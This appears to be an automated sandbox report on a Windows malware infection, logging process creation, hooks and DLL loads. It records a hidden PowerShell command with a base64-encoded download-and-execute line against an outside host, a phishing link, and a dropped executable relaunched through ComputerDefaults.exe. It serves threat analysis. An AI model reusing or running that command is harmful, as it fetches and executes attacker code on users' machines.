Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4284 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4424 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 2660 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 6336 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 6336 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7496 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 7712 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 get message C:\Windows\System32\UIAutomationCore.DLL
Source: C:\Windows\System32\Narrator.exe	Windows user hook set: 4404 call wnd proc C:\Windows\System32\UIAutomationCore.DLL

System Summary

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe

Jump to dropped file

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500

Uses a Windows Living Off The Land Binaries (LOL bins)

Source: unknown	Process created: C:\Windows\System32\AtBroker.exe atbroker.exe /start narrator /hardwarebuttonlaunch
Source: C:\Windows\System32\AtBroker.exe	Process created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
Source: C:\Windows\System32\AtBroker.exe	Process created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch

Source: classification engine

Classification label: mal100.phis.spyw.evad.win@43/10@30/197

Source: C:\Windows\System32\Narrator.exe

File created: C:\Users\user\AppData\Local\speech

Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:768:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3sac0ce.ksg.ps1

Source: C:\Windows\System32\AtBroker.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\AtBroker.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,18405873602495973812,11393449269972753126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://gtoyorupaz.emlnk9.com/lt.php?x=3DZy~GDFIXeg6XOu0N28Vuee3aIpj_XxwhphY5TIVnag78B-0Uy.y.e-3I2jmN~w"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2024,i,18405873602495973812,11393449269972753126,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: unknown	Process created: C:\Windows\System32\AtBroker.exe atbroker.exe /start narrator /hardwarebuttonlaunch
Source: C:\Windows\System32\AtBroker.exe	Process created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
Source: C:\Windows\System32\AtBroker.exe	Process created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
Source: C:\Windows\System32\AtBroker.exe	Process created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
Source: C:\Windows\System32\AtBroker.exe	Process created: C:\Windows\System32\AtBroker.exe C:\Windows\System32\ATBroker.exe /start narrator /hardwarebuttonlaunch
Source: C:\Windows\System32\AtBroker.exe	Process created: C:\Windows\System32\Narrator.exe "C:\Windows\System32\Narrator.exe" /hardwarebuttonlaunch
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -c "$cmd='';$b='aXdyIGh0dHBzOi8vYXBpb2Vrcy5pY3UvZml4IC1Vc2VCYXNpY1BhcnNpbmd8aWV4';$cmd=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b));iex $cmd;$null=' Confirm access - 7891045'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe "C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\NarratorQuickStart.exe" -ServerName:App.AppX2nbh7wcbt82z2dktjrtwk4f36gf9xxh2.mca
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" 0xaa79fbd8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe" 0xaa79fbd8
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Process created: C:\Windows\System32\winver.exe C:\Windows\System32\winver.exe
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Process created: C:\Windows\System32\ComputerDefaults.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Windows\System32\ComputerDefaults.exe	Process created: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe "C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe"
Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4256 -s 1500
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\AtBroker.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: slc.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\AtBroker.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: oleacc.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: dui70.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: srh.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: duser.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: audioses.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.media.speech.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: winmmbase.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: threadpoolwinrt.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: msacm32.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: msdmo.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: chakra.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: icuuc.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: icuin.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: icu.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: inputhost.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: magnification.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: d3d9.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: dwmapi.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: uiamanager.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: twinapi.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: atlthunk.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.media.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: textshaping.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: actxprxy.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: avrt.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.ui.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windowmanagementapi.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: twinui.appcore.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: daxexec.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: container.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\Narrator.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
